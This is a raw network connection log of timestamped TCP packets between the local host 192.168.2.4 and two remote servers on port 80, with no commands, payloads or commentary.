Jan 14, 2022 00:16:15.238010883 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.238033056 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.238056898 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.238059998 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.238080978 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.238101959 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.238105059 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.238130093 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.238136053 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.238177061 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239012003 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.239037991 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239058018 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239078999 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239100933 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239121914 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239125013 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239149094 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239161015 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239168882 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239191055 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239212990 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239228010 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239236116 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239253044 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239260912 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239283085 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239288092 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239304066 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239326000 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239343882 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239350080 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239373922 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239381075 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239398956 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239420891 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239424944 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239443064 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239465952 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239485025 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239486933 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239510059 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239511967 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239530087 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239552021 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239572048 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239578962 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239593983 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239613056 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239615917 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239638090 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239650011 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239687920 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239732027 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239753008 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239773035 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239794970 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239814043 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239831924 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239836931 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239844084 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239860058 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239881039 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239901066 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239906073 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239942074 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.239943027 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239965916 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.239986897 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.240000963 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.240040064 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.240044117 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.240062952 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.240086079 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.240108013 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.240119934 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.240148067 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.240161896 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.240204096 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.240226984 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.240248919 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.240271091 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.240271091 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.240293980 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.240313053 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.240314960 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.240336895 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.240356922 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.240358114 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.240377903 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.240377903 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.240446091 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.243074894 CET	49923	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.244290113 CET	49924	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.244383097 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.244494915 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.244606018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.244712114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.248024940 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.248045921 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.251684904 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.251966000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.252147913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.252250910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.252353907 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.252453089 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.252549887 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.252656937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.252772093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.252895117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.253000975 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.253107071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.253213882 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.253320932 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.253431082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.253535032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.253644943 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.253761053 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.253878117 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.253982067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.254091024 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.254195929 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.254311085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.254410028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.254511118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.254609108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.254714012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.254863977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.254966021 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.255067110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.255165100 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.255409956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.255470991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.255528927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.255664110 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.256328106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.256438017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.256560087 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.256716967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.256841898 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.257219076 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.257337093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.257451057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.257563114 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.257668972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.305872917 CET	80	49923	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.305965900 CET	49923	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.307327032 CET	80	49924	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.307349920 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.307554007 CET	49924	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.311958075 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.311995029 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.312016964 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.312040091 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.312062979 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.312076092 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.312084913 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.312108994 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.312124014 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.312131882 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.312144041 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.312208891 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.312221050 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.312236071 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.312258959 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.312280893 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.312305927 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.312341928 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.313458920 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.313473940 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.313493013 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.313519001 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.313541889 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.313561916 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.313565016 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.313589096 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.313606977 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.313611031 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.313638926 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.313652039 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.313684940 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.313692093 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.313708067 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.313730001 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.313751936 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.313775063 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.313779116 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.313797951 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.313817978 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.313823938 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.313858032 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.313878059 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.314138889 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314165115 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314186096 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314209938 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314232111 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314239025 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.314255953 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314274073 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.314280987 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314306974 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.314327002 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314379930 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.314589977 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314615965 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314681053 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314687967 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.314706087 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314729929 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314753056 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314775944 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314800978 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314826012 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314850092 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314857006 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.314865112 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.314870119 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.314874887 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314912081 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.314924002 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314948082 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314970970 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.314997911 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315001011 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.315035105 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.315057993 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315100908 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315119982 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.315162897 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315186977 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315208912 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315226078 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.315232038 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315268040 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.315277100 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315299988 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315323114 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315331936 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.315347910 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315371990 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315378904 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.315396070 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315419912 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315435886 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.315439939 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315464973 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315476894 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.315489054 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315511942 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315532923 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315536976 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.315556049 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315572977 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.315578938 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315606117 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315609932 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.315668106 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.315711021 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315733910 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315757036 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315778971 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315809965 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.315855026 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315860987 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.315881014 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315906048 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.315937042 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.315975904 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.316032887 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.316086054 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.316112041 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.316133022 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.316155910 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.316178083 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.316216946 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.332715034 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.339864969 CET	80	49902	185.215.113.35	192.168.2.4
Jan 14, 2022 00:16:15.386895895 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.386929035 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.386950970 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.386972904 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.386986971 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.386996031 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.387021065 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.387043953 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.387044907 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.387069941 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.387075901 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.387101889 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.387125015 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.387130022 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.387150049 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.387171030 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.387172937 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.387195110 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.387216091 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.387248039 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.387293100 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.389050961 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389076948 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389098883 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389122009 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389133930 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.389173985 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.389497042 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389520884 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389544964 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389568090 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389574051 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.389590979 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389617920 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389626026 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.389641047 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389663935 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389668941 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.389688015 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389710903 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389740944 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.389753103 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.389760971 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389785051 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389806986 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389831066 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389847994 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.389875889 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389890909 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.389898062 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389919996 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389940023 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.389965057 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.389997959 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390041113 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390064001 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390085936 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390109062 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390125990 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.390142918 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390166044 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.390176058 CET	49920	80	192.168.2.4	141.8.194.74
